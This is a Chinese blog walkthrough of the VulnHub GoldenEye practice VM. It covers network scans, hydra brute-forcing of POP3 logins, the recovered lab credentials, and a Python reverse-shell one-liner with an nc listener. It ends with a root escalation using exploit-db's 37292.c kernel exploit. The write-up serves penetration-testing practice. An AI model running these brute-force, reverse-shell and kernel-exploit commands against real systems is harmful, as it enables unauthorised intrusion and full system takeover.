本周末实践的是vulnhub的GoldenEye镜像,下载地址,https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova,
这个渗透测试镜像也很有趣,一步一个线索,
先来个地址扫描,sudo netdiscover -r 192.168.137.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.47,
先访问一下http,http://192.168.137.47/,告诉你了一个路径线索,
那就接着访问这个路径,发现要用户名密码,
再回到根页面,查看源码,告诉你了个脚本文件线索,
那就继续访问这个脚本文件,这回告诉你了个账号线索,
密码是html编码的,随便找个解密网站搞一下,
这就得到了一对账号密码:boris/InvincibleHack3r,登录试试,
还是得查看源码,
别以为这个没啥用,其实有用,在提示另一个账号,没这个还真走不下去,
到这儿http这条线就先断了,接着走另外一条线,端口扫描不是扫出来两个不知道是啥服务的端口么,进一步详查一下,
sudo nmap -Pn -p 55006,55007 -sV 192.168.137.47,
得知是pop3,那可以继续找能登录的账户,
现在手里有个boris/InvincibleHack3r,登录一下,
sudo nc 192.168.137.47 55007,发现认证不过去,
那就说明登录pop3的密码是另外的,暴破它,sudo hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.47 -s 55007 pop3,
拿到了账号密码:boris/secret1!,就可以登录pop3试试了,
啥有用线索也没拿到,这时候想到http那条线最后提示的账号natalya,继续暴破,sudo hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.47 -s 55007 pop3,
拿到了账号密码:natalya/bird,再登录pop3,
这回拿到了另外一个账户线索,并给了登录站点,
按照提示,在本地hosts文件里加上域名地址记录,访问站点,
继续找线索,看到有一个未读消息,里面又提示了一个账号doak,
继续暴破,sudo hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.47 -s 55007 pop3,
拿到了账号密码:doak/goat,再登录pop3,
哈哈,又提示了一个账户线索,dr_doak/4England!,登录站点,
发现了一个文本文件,
下载下来看看内容,
根据提示admin的密码藏在一张照片里,打开看看,
没啥有用的信息,那就下载下来看看属性,
拿到了意思base64编码过的密码,随便找个解密网站搞一下,
这就拿到了账号密码:admin/xWinter1995x!,登录进站点,
接下来就是想办法反弹shell出来了,首先写一段脚本,
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.45",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
把脚本放到这里,
然后要改环境配置,
在外面开个监听,nc -lnvp 4444,然后在这里触发,
shell就过来了,id看一下不是root,需要提权,
看一下内核版本,然后搜一下这个内核版本有没有提权方法,
有一个c文件可用,
拷贝到本地,cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
在靶机里确认一下编译环境的支持,不支持gcc,
那就得把c文件里编译命令改一下,vim 37292.c,
然后开个http文件下载服务,python -m SimpleHTTPServer,
在靶机里下载这个c文件,
编译可执行文件,cc 37292.c -o exp,
执行,拿到root权限,
本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之GoldenEye的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论